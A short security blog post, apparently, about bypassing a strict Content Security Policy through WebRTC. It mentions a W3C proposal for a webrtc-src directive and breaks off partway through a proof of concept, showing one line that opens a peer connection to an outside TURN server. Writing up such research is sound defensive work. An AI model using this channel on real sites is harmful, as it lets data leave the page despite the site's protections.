Bypassing strict CSP by abusing WebRTC

I noticed recently that there was a PR in the W3C GitHub organisation on both the webappsec-csp and webrtc-pc specification repos adding a new webrtc-src repo.

The PR in question:

Extracted POC:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=…